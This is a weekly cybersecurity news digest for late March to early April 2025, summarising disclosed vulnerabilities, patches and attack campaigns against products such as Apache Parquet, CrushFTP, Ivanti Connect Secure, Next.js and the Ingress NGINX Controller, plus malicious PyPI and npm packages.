04/02/2025-04/09/2025 Flaw in Apache Parquet, CrushFTP Vulnerability, Malicious Python Packages And More.

1. Critical Flaw in Apache Parquet Allows Remote Attackers to Execute Arbitrary Code

A critical vulnerability (CVE-2025-30065) in Apache Parquet’s Java library could allow remote code execution if exploited. The flaw, rated with a maximum CVSS score of 10.0, affects versions up to 1.15.0 and has been fixed in version 1.15.1.

According to project maintainers, the issue lies in schema parsing within the parquet-avro module. Endor Labs warns that attackers can exploit it by tricking systems into processing specially crafted Parquet files—especially dangerous for data pipelines and analytics platforms handling untrusted input. Although no active exploitation has been reported, vulnerabilities in Apache projects often draw attacker interest. Keyi Li of Amazon reported the flaw. Separately, a recent CVE-2025-24813 vulnerability in Apache Tomcat was exploited within 30 hours of disclosure. Aqua Security found an attack campaign using weak credentials to deploy Java-based web shells, steal SSH keys, and hijack resources for crypto mining—highlighting the urgency of patching such flaws quickly.

2. CISA Adds CrushFTP Vulnerability to KEV Catalog Following Confirmed Active Exploitation

CISA has added a critical CrushFTP vulnerability (CVE-2025-31161, CVSS 9.8) to its Known Exploited Vulnerabilities catalog due to active exploitation. The flaw, an authentication bypass, allows remote attackers to access any known or guessable user account, potentially leading to full system compromise. It has been patched in versions 10.8.4 and 11.3.1. Initially tracked as CVE-2025-2825, the issue sparked confusion after VulnCheck published a CVE without coordinating with the vendor or discloser, Outpost24. MITRE later assigned the official CVE. VulnCheck accused CrushFTP of delaying disclosure and criticized MITRE’s process. Huntress confirmed exploitation in the wild as early as March 30, 2025. Attackers installed remote desktop tools like AnyDesk and MeshAgent, added admin users, and deployed malware linked to a Telegram bot. At least four organizations across marketing, retail, and semiconductor sectors have been targeted.

3. Malicious Python Packages Attacking Popular Cryptocurrency Library

Cybersecurity experts have uncovered a new threat targeting cryptocurrency developers and users. Two malicious Python packages—bitcoinlibdbfix and bitcoinlib-dev—were found on PyPI, posing as fixes for the widely used bitcoinlib library.

These packages secretly exfiltrate sensitive crypto wallet data by targeting bitcoinlib’s command-line interface. Once installed, they remove the legitimate clw tool and replace it with a malicious version that intercepts user commands and transmits private wallet data to attacker-controlled servers.
The bitcoinlib library is a key resource for developers building blockchain applications, making it a prime target. The malware campaign was discovered by ReversingLabs via its Spectra platform, which uses machine learning to detect suspicious behavior.

This attack is part of a broader trend of supply chain compromises in the crypto space, with nearly two dozen incidents reported in 2024 alone. The attackers used social engineering, claiming their packages fixed a database error to trick developers into installing the malware.

4. CISA Urges Patching For ‘Critical’ Ivanti VPN Flaw

A critical vulnerability (CVE-2025-22457) in Ivanti’s Connect Secure VPN is being actively exploited and must be patched immediately, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned.

The flaw allows remote code execution and has been linked to UNC5221, a suspected China-based espionage group responsible for earlier mass attacks on Ivanti VPNs in 2024. Mandiant researchers observed malware deployments and signs of exploitation dating back to mid-March.

The vulnerability affects Ivanti Connect Secure versions 22.7R2.5 and earlier, and unsupported Pulse Connect Secure 9.1x devices. Ivanti released a fix (version 22.7R2.6) on February 11, initially misclassifying the issue as a minor bug.
CISA added the flaw to its Known Exploited Vulnerabilities catalog, urging all organizations—not just federal agencies—to update vulnerable systems. Ivanti noted its Integrity Checker Tool helped detect compromises and stressed that customers using supported versions with recommended configurations are at lower risk. Immediate upgrades are strongly advised.

5. Microsoft Patches 126 Flaws Including Actively Exploited Windows CLFS Vulnerability

Microsoft has released patches for 126 security flaws, including one actively exploited vulnerability (CVE-2025-29824) affecting the Windows Common Log File System (CLFS) Driver. This elevation of privilege (EoP) bug allows attackers with local access to gain SYSTEM-level access via a use-after-free condition. It has a CVSS score of 7.8 and has been linked to ransomware attacks. Notably, no patch is yet available for Windows 10 (32/64-bit).

Of the 126 flaws, 11 are Critical and 112 Important, covering privilege escalation, remote code execution, and denial-of-service issues. Other key fixes include RCE flaws in Windows Remote Desktop, Kerberos, Office, Excel, TCP/IP, and Hyper-V.
CISA added CVE-2025-29824 to its Known Exploited Vulnerabilities list, mandating federal agencies to patch by April 29, 2025.

Microsoft’s updates follow fixes from other major vendors, including Apple, Adobe, Cisco, Google, VMware, Fortinet, and more, addressing a wide range of vulnerabilities across platforms.

03/26/2025-04/02/2025 Over 1,500 PostgreSQL Servers Compromised, New Malware Loaders Use Call Stack Spoofing, GitHub C2, and .NET Reactor And More.

1. Over 1,500 PostgreSQL Servers Compromised in Fileless Cryptocurrency Mining Campaign

An ongoing campaign targets exposed PostgreSQL instances to deploy cryptocurrency miners, with over 1,500 victims reported. The attackers use PG_MEM malware and employ defense evasion techniques like fileless miner payloads and unique binary hashes per target.

The campaign exploits weak PostgreSQL configurations, using the COPY ... FROM PROGRAM command to run arbitrary shell commands. The attackers deploy a Base64-encoded shell script to disable competing miners and drop PG_CORE, along with an obfuscated Golang binary named postmaster. This binary creates a cron job for persistence, elevates privileges, and downloads the XMRig miner. Each compromised machine is assigned a unique mining worker, with the campaign reportedly utilizing over 1,500 machines across multiple wallets.

2. New Malware Loaders Use Call Stack Spoofing, GitHub C2, and .NET Reactor for Stealth

Cybersecurity researchers have found an updated version of Hijack Loader, a malware loader that introduces new evasion techniques and enhances persistence. The loader now includes call stack spoofing to hide the origin of function calls and performs anti-VM checks to detect sandbox environments. First discovered in 2023, Hijack Loader delivers second-stage payloads like information stealers and bypasses security software.

The latest iteration includes improvements like call stack spoofing to conceal malicious calls, using fabricated stack frames. It also integrates the Heaven’s Gate technique for process injection and delays execution by blocking Avast Antivirus processes. Two new modules, ANTIVM and modTask, enhance detection evasion and establish persistence through scheduled tasks.

Meanwhile, Elastic Security Labs revealed a new malware family, SHELBY, which uses GitHub for command-and-control and data exfiltration. The loader communicates via commits to a private repository, allowing attackers to send commands and access data without leaving detectable traces on disk.

3. Hackers Abuse WordPress MU-Plugins to Hide Malicious Code

Hackers are increasingly using the WordPress mu-plugins directory to run malicious code on every page load, evading detection. This method involves three types of malicious code planted in the ‘wp-content/mu-plugins/’ folder, which runs automatically without activation from the admin dashboard.

Mu-plugins can be used for legitimate functions, but their automatic execution makes them ideal for stealthy attacks. Sucuri identified three payloads:

1. redirect.php – Redirects users to a fake browser update site to download malware.
2. index.php – A webshell that fetches and executes PHP code remotely.
3. custom-js-loader.php – Injects malicious JavaScript to hijack images and links.

These attacks can steal credentials, harm a site’s reputation, and install malware. To prevent infections, Sucuri advises updating plugins, disabling unnecessary ones, and using strong passwords with multi-factor authentication.

4. Multiple npm Crypto Packages Hijacked

Sonatype has uncovered multiple hijacked npm cryptocurrency packages designed to steal sensitive information like API keys and SSH keys. These packages, some of which have been on npm for up to 9 years, were recently updated with malicious, obfuscated scripts.

The hijacked packages, tracked as sonatype-2025-000924, include scripts that exfiltrate sensitive data to a remote server after installation. Notably, some packages had not been updated in years, like “bnb-javascript-sdk-nobroadcast,” which received a malicious release.

Sonatype researchers suspect the hijacks may be the result of compromised npm maintainer accounts, possibly due to credential stuffing or expired domain takeovers. This incident highlights the importance of securing developer accounts with two-factor authentication (2FA) and improving supply chain security practices. Developers must remain vigilant in monitoring third-party software registries to mitigate risks associated with malicious updates in open-source packages.

5. RESURGE Malware Exploits Ivanti Flaw with Rootkit and Web Shell Features

CISA has uncovered a new malware called RESURGE, exploiting a now-patched vulnerability in Ivanti Connect Secure (ICS) appliances. RESURGE, which includes features of the SPAWNCHIMERA malware, has distinct commands altering its behavior and capabilities such as a rootkit, dropper, backdoor, proxy, and tunneler. The security flaw (CVE-2025-0282) affects several Ivanti products and could allow remote code execution. It has been weaponized to deliver the SPAWN ecosystem, linked to a China-based espionage group, UNC5337. SPAWNCHIMERA, the previous malware variant, was observed being used to patch this vulnerability.

RESURGE includes features like web shell deployment, credential harvesting, and manipulation of integrity checks. CISA also discovered two other malicious artifacts on compromised ICS devices. Organizations are urged to patch Ivanti systems, reset credentials, and monitor accounts for anomalous activity.

03/19/2025-03/26/2025 Update Next.js, Critical Ingress NGINX Controller Vulnerability, Authentication Bypass in VMware Windows Tools And More.

1. Warning For Developers, Web Admins: Update Next.js to Prevent Exploit

Developers using Next.js should install a security update to fix a critical vulnerability, CVE-2025-29927, which allows authorization bypass if the “middleware” function is enabled. This poses a serious risk for applications relying on middleware for security checks. This vulnerability allows a trivial authentication bypass. Attackers could exploit it by logging in as regular users and tampering with security controls, potentially gaining admin access. All Next.js versions from 11.1.4 onward are affected. Users should upgrade to 15.2.3 (for 15.x) or 14.2.25 (for 14.x).

Applications hosted on Vercel or Netlify, or those not using middleware, are unaffected. If patching isn’t possible, Vercel advises blocking external requests with the x-middleware-subrequest header. Ullrich noted that similar vulnerabilities have appeared in other commercial tools.

2. Critical Ingress NGINX Controller Vulnerability Allows RCE Without Authentication

Five critical vulnerabilities, dubbed IngressNightmare, have been found in the Ingress NGINX Controller for Kubernetes, exposing over 6,500 clusters to unauthenticated remote code execution. Assigned a CVSS score of 9.8, these flaws allow attackers to access all secrets across namespaces, potentially leading to cluster takeover. The vulnerabilities (CVE-2025-24513, CVE-2025-24514, CVE-2025-1097, CVE-2025-1098, CVE-2025-1974) exploit the admission controller, which lacks authentication and is accessible over the network. Attackers can inject arbitrary NGINX configurations via malicious ingress objects, executing code within the controller pod.

Cloud security firm Wiz warns that 43% of cloud environments are at risk. The Kubernetes Security Response Committee has patched the flaws in Ingress NGINX Controller versions 1.12.1, 1.11.5, and 1.10.7.

Admins should update immediately and ensure the admission webhook endpoint is not publicly exposed to mitigate risks.

3. Broadcom Warns of Authentication Bypass in VMware Windows Tools

Broadcom released security updates to fix a high-severity authentication bypass flaw (CVE-2025-22230) in VMware Tools for Windows. This vulnerability, caused by improper access control, allows local attackers with low privileges to gain high privileges on vulnerable VMs. “A malicious actor with non-administrative privileges on a Windows guest VM may perform certain high-privilege operations,” VMware warned in a security advisory.

Earlier this month, Broadcom patched three VMware zero-days (CVE-2025-22224, CVE-2025-22225, CVE-2025-22226) exploited in attacks. Shortly after, over 37,000 VMware ESXi instances were found exposed to CVE-2025-22224.

4. Coinbase Initially Targeted in GitHub Actions Supply Chain Attack; 218 Repositories’ CI/CD Secrets Exposed

A supply chain attack on the GitHub Action “tj-actions/changed-files” initially targeted Coinbase’s open-source project, agentkit, before expanding. The attacker compromised the GitHub Action to leak repository secrets, earning CVE-2025-30066 (CVSS 8.6).

Endor Labs found 218 repositories exposed secrets, including credentials for DockerHub, npm, AWS, and GitHub tokens. Another compromised GitHub Action, “reviewdog/action-setup” (CVE-2025-30154), enabled attackers to modify “tj-actions/changed-files,” affecting all dependent repositories.

The attacker used obfuscation techniques, including dangling commits and temporary accounts, to evade detection. While GitHub found no evidence of a platform compromise, the attack suggests deep knowledge of CI/CD security.
Initially targeting Coinbase, the attacker may have shifted to a broader campaign after Coinbase mitigated the threat. The motive remains unclear but is likely financial, possibly involving cryptocurrency theft. Coinbase has since remediated the attack.

5. CISA Adds NAKIVO Vulnerability to KEV Catalog Amid Active Exploitation

CISA has added a high-severity flaw in NAKIVO Backup & Replication (CVE-2024-48248, CVSS 8.6) to its Known Exploited Vulnerabilities (KEV) catalog. The path traversal bug allows unauthenticated attackers to read sensitive files, including stored credentials. It affects versions before 10.11.3.86570 and was patched in v11.0.0.88174.

Two other vulnerabilities were also added:

• CVE-2025-1316 (CVSS 9.3): A remote code execution flaw in Edimax IC-7100 IP cameras, exploited to deploy Mirai botnet variants. (Unpatched)
• CVE-2017-12637 (CVSS 7.5): A directory traversal flaw in SAP NetWeaver AS Java, used to steal sensitive SAP system files, potentially leading to full system compromise.

Federal agencies must apply mitigations by April 9, 2025. SAP cybersecurity firm Onapsis reports active exploitation of CVE-2017-12637, with attackers leveraging it to extract privileged credentials and gain full access to vulnerable SAP applications.